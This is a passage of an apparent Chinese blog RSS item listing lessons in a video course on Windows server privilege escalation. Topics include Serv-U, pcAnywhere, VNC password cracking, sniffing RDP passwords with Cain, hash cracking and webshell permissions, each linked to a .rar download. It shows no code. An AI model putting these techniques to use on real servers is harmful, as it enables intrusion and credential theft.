serv-u服务器提权（目录有修改权限）&nbsp;&nbsp; <br /><a id="url_15" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq03.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq03.rar</font></a> <br />第四课 pcanywhere提权方法 <br /><a id="url_16" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq04.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq04.rar</font></a> <br />第五课 FlashFXP替换文件提权 <br /><a id="url_17" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq05.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq05.rar</font></a>&nbsp;&nbsp; <br />第六课 VNC密码破解提权<br /><a id="url_18" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq06.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq06.rar</font></a> <br />第七课 CAIN 嗅探3389密码提权 <br /><a id="url_19" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq07.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq07.rar</font></a> <br />第八课 替换服务提权 <br /><a id="url_20" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq08.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq08.rar</font></a>&nbsp;&nbsp; <br />第九课 利用HASH破解提权 <br /><a id="url_21" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq09.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq09.rar</font></a> <br />第十课 启动项提权 <br /><a id="url_22" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq10.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq10.rar</font></a>&nbsp;&nbsp; <br />第十一课 CAcls命令在提权中的使用&nbsp;&nbsp; <br /><a id="url_23" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq11.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq11.rar</font></a> <br />第十二课 Windows-2003-webshell默认权限&nbsp;&nbsp; <br /><a id="url_24" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq12.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq12.rar</font></a> <br />第十三课 Windows 2003服务器默认文件夹权限 <br /><a id="url_25" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq13.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq13.rar</font></a> <br />第十四课 利用perl提升权限 <br /><a id="url_26" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq14.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq14.rar</font></a>&nbsp;&nbsp; <br />第十五课 端口映射解决内网提权 <br /><a id="url_27" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq15.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq15.rar</font></a></p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/135.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=135</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=135&amp;key=fd9fafd1</trackback:ping></item></channel></rss>
